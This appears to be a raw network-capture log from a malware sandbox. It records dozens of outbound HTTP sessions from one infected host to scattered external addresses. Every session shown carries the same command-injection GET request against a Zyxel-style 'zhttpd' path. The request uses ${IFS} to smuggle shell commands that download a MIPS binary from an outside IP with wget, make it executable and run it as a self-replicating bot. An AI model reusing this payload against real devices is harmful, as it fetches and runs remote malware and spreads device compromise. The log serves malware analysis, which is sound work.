                                            Feb 2, 2024 06:21:31.004659891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9097192.168.2.154187094.130.23.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004720926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9098192.168.2.1555110108.199.230.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004754066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9099192.168.2.1537878180.30.83.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004829884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9100192.168.2.1534500221.250.68.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004851103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9101192.168.2.1547806196.184.111.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004889965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9102192.168.2.1543732185.73.239.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004941940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9103192.168.2.15527764.6.195.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004946947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9104192.168.2.1546642204.79.129.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005007982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9105192.168.2.153732035.243.143.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005037069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9106192.168.2.154568090.112.168.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005058050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9107192.168.2.1554638190.96.45.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005111933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9108192.168.2.155285087.59.221.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005156994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9109192.168.2.1547626145.43.243.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005191088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9110192.168.2.155744034.6.170.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005247116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9111192.168.2.155696043.161.205.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005307913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9112192.168.2.1533406110.219.144.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005321026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9113192.168.2.154688625.42.15.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005361080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9114192.168.2.1558360212.65.127.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005405903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9115192.168.2.1544704193.214.254.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005450964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9116192.168.2.1534600142.164.41.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005458117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9117192.168.2.153317241.37.242.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005508900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9118192.168.2.1560020114.229.60.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005528927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9119192.168.2.1555156199.3.82.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005599976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9120192.168.2.154639090.142.109.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005626917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9121192.168.2.1547322106.55.196.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005664110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9122192.168.2.155203886.192.74.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005717993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9123192.168.2.1556710184.124.242.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005750895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9124192.168.2.1533542145.167.163.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005769968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9125192.168.2.1552134128.36.217.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005825043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9126192.168.2.1535880167.185.185.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005866051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9127192.168.2.1545660178.89.18.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005908012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9128192.168.2.1546826108.133.104.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.005965948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9129192.168.2.155632081.250.213.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006009102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9130192.168.2.1543292131.111.209.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006047964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9131192.168.2.1559374133.248.16.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006062031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9132192.168.2.155221095.104.239.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006134987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9133192.168.2.1550480126.155.75.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006154060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9134192.168.2.155442640.169.161.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006176949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9135192.168.2.1553502210.55.125.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006243944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9136192.168.2.1557600156.161.70.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006287098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9137192.168.2.1551254140.16.174.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006315947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9138192.168.2.153580217.220.249.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006377935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9139192.168.2.153509020.209.188.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006402016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9140192.168.2.1556098211.41.25.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006428003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9141192.168.2.1559046168.252.25.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006473064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9142192.168.2.15507962.149.89.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006503105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9143192.168.2.154896064.28.205.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006539106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9144192.168.2.153809066.254.40.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006587029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9145192.168.2.1543394141.11.200.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006634951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9146192.168.2.1557136122.18.219.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006685019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9147192.168.2.1555246167.222.51.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006721973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9148192.168.2.155850035.95.245.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006748915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9149192.168.2.1534516125.243.157.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006800890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9150192.168.2.1548554113.240.67.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006838083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9151192.168.2.1538712177.165.228.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006871939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9152192.168.2.1536462176.160.196.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006884098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9153192.168.2.1536990164.219.164.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006937981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9154192.168.2.1550838177.9.8.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.006969929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9155192.168.2.1534150220.115.94.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007019997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9156192.168.2.155946239.18.77.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007055998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9157192.168.2.1545802182.121.96.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007101059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9158192.168.2.154199288.66.201.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007152081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9159192.168.2.1537952217.127.92.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007179022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9160192.168.2.1552422219.86.55.200443
                                            TimestampBytes transferredDirectionData
